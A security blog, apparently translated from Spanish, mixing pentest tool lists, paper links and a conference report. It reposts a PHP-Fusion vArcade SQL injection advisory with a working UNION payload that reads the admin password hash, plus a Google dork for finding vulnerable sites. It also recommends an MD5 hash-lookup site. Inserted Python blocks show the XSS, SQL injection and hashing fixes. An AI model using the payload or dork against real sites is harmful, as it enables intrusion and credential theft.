Personal site of Ariel M. Liguori De Gottig

Saturday, January 10

Happy Holidays... For Whom?

As was to be expected, the holidays didn't arrive alone (no, man, nobody brought you presents, or at least not that kind of present). If you don't believe me, take a look at this PC World article.

Regards,

Oracle Database PenTest

As promised...
Penetration testing usually spans several areas, and databases stand out among them. In this post I'll show you the not-so-well-known tools for pentesting Oracle databases.

OScanner: Oscanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with a couple of plugins that currently do:

- Sid Enumeration
- Password tests (common & dictionary)
- Enumerate Oracle version
- Enumerate account roles
- Enumerate account privileges
- Enumerate account hashes
- Enumerate audit information
- Enumerate password policies
- Enumerate database links

The results are given in a graphical java tree.


Oracle Auditing Tools (OAT): The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.

DBPwAudit: DBPwAudit is a Java tool that allows you to perform online audits of password quality for several database engines. The application design allows additional database drivers to be added simply by copying new JDBC drivers into the jdbc directory. Configuration is performed in two files: aliases.conf maps drivers to aliases, and rules.conf tells the application how to handle error messages from the scan.

SidGuesser: Guesses sids/instances against an Oracle database according to a predefined dictionary file.


Links of interest:

Friday, January 9

Careful! Don't underestimate XSS!

Because of the post I published recently, I've felt uneasy about having said how ineffective XSS can be. That reminded me of an s21sec post where they clearly say XSS must not be underestimated. Why? Look at it here and understand things better ;).

Something worth highlighting is that XSS is the most common vulnerability in web pages. That's worrying, and also striking, since it is relatively simple to fix this kind of problem.
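The post above says this kind of problem is relatively simple to fix. As an added example (not from the original post or from s21sec), the following Python shows the fix in its simplest form: the same page fragment rendered once with user input pasted straight into the markup, and once with the input entity-encoded first. The templates, the comment text and the author name are constructed sample values; `tag_count` is a helper written for this example to make the difference measurable.

```python
import html

# Constructed sample inputs (built for this example, not taken from the post).
# A comment that tries to smuggle a script element into the page:
USER_COMMENT = '<script>alert(document.cookie)</script>'
# A name aimed at an attribute context: it closes value="" and adds a handler:
USER_NAME = '" autofocus onfocus="alert(1)'

# Two constructed fragments: one text-node context, one attribute context.
TEXT_TEMPLATE = "<p>Last comment: {comment}</p>"
ATTR_TEMPLATE = '<input type="text" name="author" value="{name}">'


def render_vulnerable(comment, name):
    """The bug: user input is concatenated into markup, so both the text
    node and the attribute value become injection points."""
    return TEXT_TEMPLATE.format(comment=comment) + ATTR_TEMPLATE.format(name=name)


def render_safe(comment, name):
    """The fix: entity-encode <, >, &, \" and ' before the input meets the
    markup. quote=True matters for the attribute context; without it a
    double quote in the input still closes the attribute."""
    return (TEXT_TEMPLATE.format(comment=html.escape(comment, quote=True))
            + ATTR_TEMPLATE.format(name=html.escape(name, quote=True)))


def tag_count(page):
    """Number of '<' characters in a rendered page. In the safe rendering
    only the template's own tags survive, so this equals TEMPLATE_TAG_COUNT."""
    return page.count("<")


TEMPLATE_TAG_COUNT = tag_count(TEXT_TEMPLATE + ATTR_TEMPLATE)  # 3 in these templates


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(USER_COMMENT, USER_NAME))
    print("safe:      ", render_safe(USER_COMMENT, USER_NAME))
```

Encoding at output time, in the context the value lands in (text node, attribute, URL, script), is the whole fix; a real templating engine does exactly this when auto-escaping is left on.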

Regards,

XSS - Cross Site Scripting

Today I've dug up this topic again, one I had already forgotten about because of its limited and ineffective use (still, there's always someone we can make fall for it ¬¬). However, I'm here only to show you a couple of documents with good information on the subject:

XSS - Cross Site Scripting Explained (PDF in English).
Cross Site Scripting - By Soulblack (PDF in Spanish).

Regards,

Windows 7 brief review.

Hi, as many of you already know, the Beta (1) of Windows 7 has been released and many have already been able to try it, among them a "Maligno" whom I've been following for a while and who, being, as he himself put it, a "Most Valuable Bitch" (among other things), has had "the pleasure of trying it"; on his blog there is a brief review of this version.
For those of us who are not "Most Valuable Bitches" or anything of the sort, we'll have to make do with searching for it on the web ;)

Brief Review of Windows 7

SQL Injection Vulnerability in PHP-Fusion.

Use with care and for educational purposes only :)

----------------------------------------------------------------
Script : PHP-Fusion Mod vArcade 1.8
Type : Sql Injection Vulnerability
Risk : High
----------------------------------------------------------------
Download From : http://venue.nu/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
My Official Website : http://FEREIDANI.IR
Our Team Website : http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------
Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/
----------------------------------------------------------------
Tnx : God
http://IRCRASH.COM http://FEREIDANI.IR
----------------------------------------------------------------
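As an added example (not part of the advisory, and not PHP-Fusion's or vArcade's own code), the following Python reproduces the pattern the advisory's URL relies on against a constructed SQLite schema: the comment_id parameter is concatenated into the SQL text, so the single quote in the payload ends the string literal and the UNION appends a row from the users table to the result. Beside it are the hardened lookups: bind the value as a query parameter, and validate that comment_id is an integer before it gets anywhere near the database. The table names, columns and rows are constructed for the demonstration and are not the real PHP-Fusion schema.

```python
import sqlite3


def build_db():
    """Constructed in-memory schema for this example: an 8-column comments
    table (so the advisory's 8-column UNION lines up) and a users table
    holding the data the payload tries to read."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE varcade_comments(
            comment_id INTEGER, comment_name TEXT, c3 INTEGER, c4 INTEGER,
            c5 INTEGER, c6 INTEGER, c7 INTEGER, comment_message TEXT);
        INSERT INTO varcade_comments VALUES (1, 'alice', 0, 0, 0, 0, 0, 'nice game');
        CREATE TABLE fusion_users(user_id INTEGER, user_name TEXT, user_password TEXT);
        INSERT INTO fusion_users VALUES (1, 'admin', 'hash-of-admin-password');
    """)
    return db


# The advisory's payload, URL-decoded ('%27' -> quote, '+' -> space).
ADVISORY_PAYLOAD = ("9999' union select 0,user_name,2,3,4,5,6,user_password "
                    "from fusion_users where user_id=1/*")


def fetch_comment_vulnerable(db, comment_id):
    """The anti-pattern: the request parameter is pasted into the SQL text.
    A quote in it ends the literal and the rest is parsed as SQL; the
    trailing /* comments out whatever the application appended."""
    sql = "SELECT * FROM varcade_comments WHERE comment_id='" + comment_id + "'"
    return db.execute(sql).fetchall()


def fetch_comment_parameterized(db, comment_id):
    """Hardened (1): the value travels as a bound parameter, so it can only
    ever be compared as data; the quote and the UNION are just characters."""
    return db.execute("SELECT * FROM varcade_comments WHERE comment_id=?",
                      (comment_id,)).fetchall()


def fetch_comment_safe(db, comment_id):
    """Hardened (2): comment_id is an integer in this schema, so reject
    anything that is not one before it reaches the query, and still bind it."""
    try:
        cid = int(comment_id)
    except (TypeError, ValueError):
        raise ValueError("comment_id must be an integer") from None
    return db.execute("SELECT * FROM varcade_comments WHERE comment_id=?",
                      (cid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("concatenated:", fetch_comment_vulnerable(db, ADVISORY_PAYLOAD))
    print("parameterized:", fetch_comment_parameterized(db, ADVISORY_PAYLOAD))
```

Parameterization alone is enough to stop the injection; the integer check on top of it turns a malformed request into an error the application can log, which is also the signal a detection rule would look for in the web server logs (a comment_id value containing quotes or SQL keywords).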

Thursday, January 8

Forensics Workshop I. FATxx

Hi, here is the link for everyone to Forensics Workshop No. 1 by the great Vic Thor; I hope it's useful and you enjoy it as much as I did :).

Forensics Workshop I

Regards,

Penetration Testing Tools

A very complete list of pentesting tools; all the info was taken from forinsect.

Packet Shaper:
• Nemesis: a command line packet shaper
• Packit: The Packet Toolkit - A network packet shaper.
• Hping by Antirez: a command line TCP/IP packet shaper
• Sing: stands for 'Send ICMP Nasty Garbage'; sends fully customizable ICMP packets
• Scapy: a new python-based packet generator

Password Cracker/Login Hacker:
• John the Ripper: a well-known password cracker for Windows and *nix Systems
• Djohn: a distributed password cracker based on "John the Ripper"
• Cain & Abel: an advanced password recovery tool for Windows systems. It sniffs the network packets and cracks authentication by brute force or with dictionary attacks.
• Project RainbowCrack: Advanced instant NT password cracker
• Rainbowtables: The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).
• Windows NT password recovery tool by Peter Nordahl
• THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.
• Hydra by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus.
• Medusa: parallel network login auditor
• THC imap bruter: a very fast imap password brute forcer
• x25bru: a login/password bruteforcer for x25 pad
• Crowbar: a generic web brute force tool (Windows only; requires .NET Framework)
• MDCrack-NG: a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables

Advanced Sniffers:
• Wireshark (formerly known as Ethereal): an open source network protocol analyzer
• Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools
• Ettercap: a multipurpose sniffer/interceptor/logger for switched LAN environments
• aimsniffer: monitors AOL Instant Messenger communication on the network
• 4G8: a tool, similar to ettercap, to capture network traffic in switched environments
• cdpsniffer: Cisco discovery protocol (CDP) decoding sniffer

Port Scanner / Information Gathering:
• nmap: currently the best-known port scanner. Since version 3.45 it supports version scans. Have a look at PBNJ for diffing different nmap scans.
• ISECOM released their nmap wrapper NWRAP, which shows all known protocols for the discovered ports from the Open Protocol Resource Database
• Nmap::Scanner: Perl output parser for nmap
• Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.
• vmap by THC: version mapper to determine the version (sic!) of scanned daemons
• Unicornscan: an information gathering and correlation engine
• DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
• Athena: a search engine query tool for passive information gathering

Security Scanner:
• Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.
• OpenVAS: a fork of Nessus 2.2.5 (formerly known as GNessUs)
• Nessj: a java based nessus (and compatibles) client (formerly known as Reason)
• Paul Clip from @stake released AUSTIN, a security scanner for Palm OS 3.5+.

Webserver:
• Nikto: a web server scanner with anti-IDS features. Based on Rain Forest Puppy's libwhisker library.
• Wikto: a webserver assessment tool (Windows only; requires .NET framework)
• WSDigger: a black box web pen testing tool from Foundstone (Windows based)
• Metis: a java based information gathering tool for web sites

Fingerprinting:
• SinFP: a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets
• Winfingerprint: much more than a simple fingerprinting tool. It scans for Windows shares, enumerates usernames, groups, SIDs and much more.
• p0f 2: Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a complete rewrite of the old p0f code.
• xprobe2: a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team
• Cron-OS: an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as "RING" and is now published as an nmap addon.

Proxy Server:
• Burp proxy: an interactive HTTP/S proxy server for attacking and debugging web-enabled applications
• Screen-scraper: a http/https-proxy server with a scripting engine for data manipulation and searching
• Paros: a man-in-the-middle proxy and application vulnerability scanner
• WebScarab: a framework for analyzing web applications. One of its basic functions is use as an intercepting proxy.

War Dialers:
• IWar: a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operating systems, and the only one with VOIP functionality (to my knowledge)
• THC-Scan: a war dialer for DOS, Windows and DOS emulators

Malware / Exploit Collections:
• packetstormsecurity.org: Huge collections of tools and exploits
• ElseNot Project: The project tries to publish an exploit for each MS Security Bulletin. A script kiddie dream come true.
• Offensive Computing: Another malware collection site
• Securityforest: try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff

Databases / SQL:
• sqlninja: a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
• CIS Oracle Database Scoring Tool: scans Oracle 8i for compliance with the CIS Oracle Database Benchmark
• SQLRecon: an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.
• absinthe: a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here).
• SQL Power Injector: a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)

Voice over IP (VOIP):
• vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
• SiVuS: a VOIP vulnerability scanner - SIP protocol (beta, Windows only)
• Cain & Abel: mostly a password cracker, can also record VOIP conversations (Windows only)
• sipsak (SIP Swiss army knife): a SIP packet generator
• SIPp: a SIP test tool and packet generator
• Nastysip: a SIP bogus message generator
• voipong: dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
• Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
• rtptools: a toolset for rtp recording and playing

Networkbased Tools:
• yersinia: a network tool designed to take advantage of some weaknesses in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
• Netsed: alters content of network packets while forwarding the packets
• ip6sic: an IPv6 stack integrity tester

VPN:
• ike-scan: an IPSec enumeration and fingerprinting tool
• ikeprobe: ike scanning tool
• ipsectrace: a tool for profiling ipsec traffic in a dump file. Initial alpha release
• VPNMonitor: a Java application to observe network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if of somewhat limited use in a real pen test.
• IKECrack: an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])
• DNSA: a DNS auditing tool by Pierre Betouin

A little more:
• Hunt: a session hijacking tool with a curses GUI
• SMAC: a Windows MAC address modifying utility. Supports Windows 2000 and XP.
• The WebGoat Project: a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.
• TSCrack: a Windows Terminal Server brute forcer
• Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning (NetScan, MobilePenTester). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools, so use the alternative download links above instead.
• THC-FuzzyFingerprint: generates fuzzy fingerprints that look almost equal to a given fingerprint/hash-sum. Very useful for MITM attacks.
• BeatLM: a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM.
• THC vlogger: a Linux kernel based keylogger
• The Metasploit Framework: an "advanced open-source platform for developing, testing, and using exploit code".
• ATK (Attack Tool Kit): a combination of security scanner and exploit framework (Windows only)
• Pirana: an exploitation framework to test the security of email content filters. See also the whitepaper.
• PassLoc: a tool which provides the means to locate keys within a buffer. Based on the article "Playing hide and seek with stored keys" by Adi Shamir.
• Dl-Hell: identifies an executable's dynamic link library (DLL) files
• DHCPing: a security tool for testing DHCP security
• ldapenum: a Perl script for enumeration against LDAP servers.
• Checkpwd: a dictionary based password checker for Oracle databases
• NirCmd from NirSoft: a Windows command line tool to manipulate the registry, initiate a dialup connection and much more
• Windows Permission Identifier: a tool for auditing user permissions on a Windows system
• MSNPawn: a toolset for footprinting, profiling and assessment via MSN Search. Windows only, .NET required
• snmpcheck: a tool to gather information via SNMP. Works on Linux, *BSD and Windows systems.
• pwdump6: extracts NTLM and LanMan hashes from Windows targets

Make the most of it; a couple more coming soon ;-)

25th Chaos Communication Congress

The 25th Chaos Communication Congress is over and again has been a great success. About 5,000 people gathered in the Congress Center in the heart of Berlin. As usual, the event was a great mixture of lectures and workshops; serious and funny things around "hacking". [25c3 wiki]

Down near the "Lounge" was the Hackcenter with its different projects. Here you could build your own quadrocopter [video] [info], extend your IXUS camera with additional features like adjustable shutter speed [info], have fun with microcontrollers [info] or relax while playing a round of 3d-pong [video] in the blinkenarea. A complete list of all projects held at the 25c3 can be found here.

Dan Kaminsky's talk about DNS was very interesting, although there was nothing really new. Basically it was a summary with the most relevant information around the DNS bug which was published this year. [video]

Jacob Appelbaum not only had his lecture about the Cold Boot Attacks [info] , but with Alexander Sotirov and his crew he also held the famous talk about creating a malicious root CA based on a MD5 collision attack. [S21sec blog] [slides] [video] [info]

Thorsten Holz spoke about their attempt to analyze banking malware and find the related C&C servers in an automated way. Among other things they improved and extended www.cwsandbox.org - a binary analyzer like virustotal.com - being able to simulate user interaction in order to behave like a human and e.g. enter credentials into sensitive web sites. They also managed to find and identify lots of "Dropzones" - including full access to some of them. With statistic information about the gathered data of the last seven months he finished this very interesting talk. [slides] [info]

Felix Lindner aka FX had a very interesting speech about a new generation of Cisco exploits. His attempt was to find a generic and version independent way of exploiting Cisco routers. [slides]

These have only been some of my personal favorites; you can find an overview of all the talks at the following links. Some, but not all, of the slides and videos are published yet. If audio is enough for you, you'll find a few more there. [talks] [slides] [videos] [audio]

Let's see if the coming 26c3 congress will again be placed in Berlin's Congress Center, since it was quite overcrowded and hard to get into some of the lectures.

Finally here you have some random and related links: [flickr] [youtube] [Dan Kaminsky's Pics]

Clemens Kurtenbach
S21sec e-crime

Source: s21sec

Wednesday, January 7

Session Security in Web Applications

s21sec has launched a series of notes on session security in web applications. They really contain very complete information; they're currently on the third installment, and that's why I recommend them! Don't miss them!

Session Security in Web Applications I
Session Security in Web Applications II
Session Security in Web Applications III

Regards,

Cryptographic hash Algorithm Competition

In case many of you didn't know, a competition is being held to determine the new cryptographic hash algorithm, which will be called SHA-3. In the first round, 51 of the initial 64 entrants remain, and analysis of the remaining algorithms is still going on.
On this page you can see which of the algorithms have already been broken and the technique used to do it (in another post we'll detail what each method means).
We'll see who ends up victorious!

More information at:

Getting the password from an MD5 hash

Surely everyone has heard of the MD5 hash algorithm, since it is very widely used day to day. That's why it will be of interest to know the password behind a hash produced with this algorithm, and so I recommend a page here where a huge number of precomputed hashes are already stored: PassCracking.ru. I hope it helps ;)
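Why do sites like the one linked above work at all? As an added example (not from the original post or from PassCracking.ru), the following Python builds a tiny precomputed MD5 table from a constructed list of common passwords and matches an unsalted digest against it, which is the lookup such a site performs at enormous scale. It then shows the defender's fix: a per-user random salt plus an iterated key derivation (PBKDF2-HMAC-SHA256 here, chosen for this example because it ships in the standard library), which makes a precomputed table worthless and each guess expensive.

```python
import hashlib
import hmac
import os

# Constructed list of common passwords; a real lookup site holds billions.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]


def md5_hex(password):
    """Unsalted MD5 as many older applications stored passwords."""
    return hashlib.md5(password.encode()).hexdigest()


# The "precomputed table": digest -> password, built once, looked up forever.
MD5_TABLE = {md5_hex(p): p for p in COMMON_PASSWORDS}


def lookup_unsalted(digest_hex):
    """Unsalted MD5 is deterministic: the same password always yields the
    same digest, so a stored digest is recovered by a dictionary lookup."""
    return MD5_TABLE.get(digest_hex.lower())


PBKDF2_ITERATIONS = 200_000  # assumption of this example; tune to your hardware


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Mitigation: random per-user salt + iterated KDF. The salt means every
    user would need their own precomputed table; the iteration count makes
    building (or brute-forcing) one slow. Returns (salt, digest) to store."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, digest, iterations=PBKDF2_ITERATIONS):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("md5('password') ->", lookup_unsalted(md5_hex("password")))
    salt, digest = hash_password("password")
    print("salted+iterated digest:", digest.hex())
    print("verify:", verify_password("password", salt, digest))
```

The table lookup is instant because MD5 has no salt and costs microseconds per guess; with the salted construction two users who chose the same password get different digests, so nothing precomputed applies and the stored value cannot even be linked across accounts.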

Regards,

Tuesday, January 6

Advanced SQL Injection in SQL Server Applications

Looking for information to solve level 6 of the Blindsec Game, I found myself needing to study SQL injection in depth; for that I found a magnificent paper in English, Advanced SQL Injection in SQL Server Applications, which neofito has translated :)

See the original file in English.
See the version translated by neófito.

IPv6 on Windows

Today I was reading Richard Bejtlich's blog and discovered that the option of making IPv6 connections is already available through a program (Gateway 6 6.0-BETA4 Client) from go6. This software lets us establish a connection that assigns us an IPv6 address; nothing out of this world, but we'll be able to get into ipv6.google.com :).

Original source and more details: IPv6 Tunnel on Windows XP Using Freenet6 (TaoSecurity)
Software available at Go6.

Oracle Default Password List

Not much to explain; the title is very illustrative. You can download it from Pete Finnigan's site in various formats (.csv, .sql, .xls, .sxc, .htm).

Check it out here.

Regards,

Monday, January 5

The Official Nmap Project Guide to Network Discovery and Security Scanning

As you'll know (though some may not have heard), from Fyodor's hand comes this practical book whose aim is to introduce us to the magnificent world of Nmap, which, to my taste, is one of the best tools ever designed. Many of you must know it already, and if not, I don't know what you're waiting for to go to the downloads section.
You can see the first half of the book on the Nmap page, book section ;).

Regards,

Building our own laptop

Something I always wanted to do :-)

http://www.vjspain.com/articulos/tutoriales/HARD_portatil_maleta_DLCRW.pdf

Regards,